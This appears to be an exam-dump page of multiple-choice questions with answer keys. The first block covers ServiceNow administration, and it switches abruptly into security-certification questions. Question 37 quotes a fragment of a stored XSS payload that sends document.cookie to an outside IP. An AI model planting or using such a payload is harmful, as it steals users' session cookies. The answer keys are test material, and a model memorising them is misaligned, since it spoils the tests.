QUESTION 21
What is the result of the order in which access controls are evaluated?
A. Ensures user can get to work as quickly as possible
B. Ensures user has access to the application, before evaluating access to a module within the application
C. Ensures user has access to a table, before evaluating access to a field in the table
D. Ensures user has access to the fields in a table, before considering their access to the table
Correct Answer: C
QUESTION 22
What is used to determine user access to knowledge bases or a knowledge article?
A. User Criteria
B. Read Access Flag
C. sn_kb_read, sn_article_read
D. Privacy Settings
Correct Answer: A
QUESTION 23
What action helps to see which modules are visible to a user?
A. Impersonate the user
B. Launch a NowChat window
C. Initiate a Connect Chat session
D. Install the Bomgar plug-in
Correct Answer: A
QUESTION 24
What helps to define the structure of a catalog item form that is displayed to the customer?
A. Catalog Description
B. Variables
C. Order Guides
D. Catalog Definition
Correct Answer: B
QUESTION 25
When managing tags, you can adjust who is able to see it. What are the visibility options for a tag? Choose 3 options.
A. Everyone
B. Groups and Users
C. Me
D. Roles and Permissions
E. Admins
Correct Answer: ABC
QUESTION 26
Which feature automates business logic like approvals, tasks, notifications, and record operations for an application or process?
A. Action Sequences
B. Flow Diagrams
C. Flows and Subflows
D. Task Flows
Correct Answer: C
QUESTION 27
A user needs to create a Catalog Item for ordering a new desktop computer with these specifications:
Color: Black or Silver
RAM: 32 GB or 64 GB
Keyboard: Standard or Ergonomic
Monitor: 24 inch or 32 inch
What is added to the Catalog Item form?
A. Choices
B. Variables
C. Fields
D. UI options
Correct Answer: B
QUESTION 28
What protects applications by restricting access to data in another application, in the same instance?
A. Assignment Rules
B. Application Scope
C. Admin Center
D. Access Control Rules
Correct Answer: B
QUESTION 29
Which interface allows users to search articles, submit requests, and browse communication notices?
A. Employee Self Service
B. Customer Service Management
C. One Stop Shop
D. Service Portal
Correct Answer: D
QUESTION 30
What action can be performed by selecting the Additional actions menu in Table Builder?
A. Add a new module
B. Schedule a job
C. Duplicate the selected form view
D. Create a database index
Correct Answer: D
QUESTION 31
Which ServiceNow capability allows you to provide knowledge articles, via a conversational messaging interface?
A. Virtual Agent
B. Now Messenger
C. Instance Chat
D. Agent Assist
Correct Answer: A
QUESTION 32
Which access control rule applies to every field in the incident table?
A. Incident||*
B. incident.all
C. incident.*
D. incident<=>*
Correct Answer: C
QUESTION 33
Typically, based on Best Practice, which of the following interactions is used to make fields mandatory, read only, and/or hidden?
A. UI Policies
B. Client Scripts
C. Business Rules
D. UI Actions
Correct Answer: A
QUESTION 34
Which component of a table contains a piece of data for one record?
A. Item
B. Datapoint
C. Element
D. Field
E. Factor
Correct Answer: D
QUESTION 35
How does a user exclude “Incidents with a State of Resolved” on an active incidents list?
A. On the list of records, locate and right-click on the Resolved value, and select Exclude
B. On Search, select State, type not Resolved, press enter
C. On State column title, right-click, select Filter Out > Resolved
D. On the list of records, locate and right-click on the Resolved value, and select Filter Out
Correct Answer: D
QUESTION 36
A penetration tester is drafting a report of findings and recommendations. Multiple EOL biomedical devices were compromised using a combination of known-exploit payloads for CVEs and VLAN hopping. The tester acknowledges that the systems cannot be changed or replaced in the hospital due to regulatory, safety, and cost reasons. Which of the following are the most effective controls for this scenario? (Select two).
A. Deploying an IDS with active response for threat activities from a network tap
B. Implementing QoS that limits the throughput of the link speeds from some VLANs
C. Limiting trunking protocols to specific uplink ports of access switches
D. Adding a proxy and requiring medical staff to authenticate every connection
E. Inserting an in-line IPS between network segments of the affected hosts
F. Performing security awareness training for these devices users
Correct Answer: CE
QUESTION 37
During a forensic review of a cybersecurity incident, a security engineer collected a portion of the payload used by an attacker on a comprised web server. Given the following portion of the code:
..aad…<> ..document.location=”https://10.10.1.2/?”x=+document.cookie; ..12..fa. .<>. ..ash2145621…41..2…8.8.
Which of the following best describes this incident?
A. XSRF attack
B. Command injection
C. Stored XSS
D. SQL injection
Correct Answer: C
QUESTION 38
A security analyst is developing a threat model that focuses on attacks associated with the organization’s storage products. The products:
1. Are used in commercial and government user environments
2. Are required to comply with crypto-export requirements
3. Include both hardware and software components that are developed by external vendors in Europe and Asia
Which of the following are the most important for the analyst to consider when developing the model? (Select two).
A. Contractual obligations
B. Legal hold obligations
C. Trust boundaries
D. Cloud services enumeration
E. supply chain access
F. Homomorphic encryption usage
Correct Answer: CE
QUESTION 39
A software development team requires valid user data for internal tests. Company regulations, however, do not allow the use of this data in cleartext. Which of the following solutions best meets these requirements?
A. Configuring data hashing
B. Deploying tokenization
C. Replacing data with null records
D. Implementing data obfuscation
Correct Answer: B
QUESTION 40
A security administrator must ensure that all connections from clients to email servers are using post-quantum cryptography. Which of the following best describes the purpose of this task?
A. To provide higher levels of assurance of the integrity of messages sent from the organization
B. To meet regulatory requirements to maintain the personal privacy of the organization’s employees
C. To prevent attackers from intercepting messages in transit between clients and servers
D. To reduce the likelihood that messages are decrypted by threat actors in the future
Correct Answer: D
We use cookies to improve your experience, including essential cookies required for the website to function. By continuing, you agree to our use of cookies. Learn more.
We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.
Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with customised advertisements based on the pages you visited previously and to analyse the effectiveness of the ad campaigns.
Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.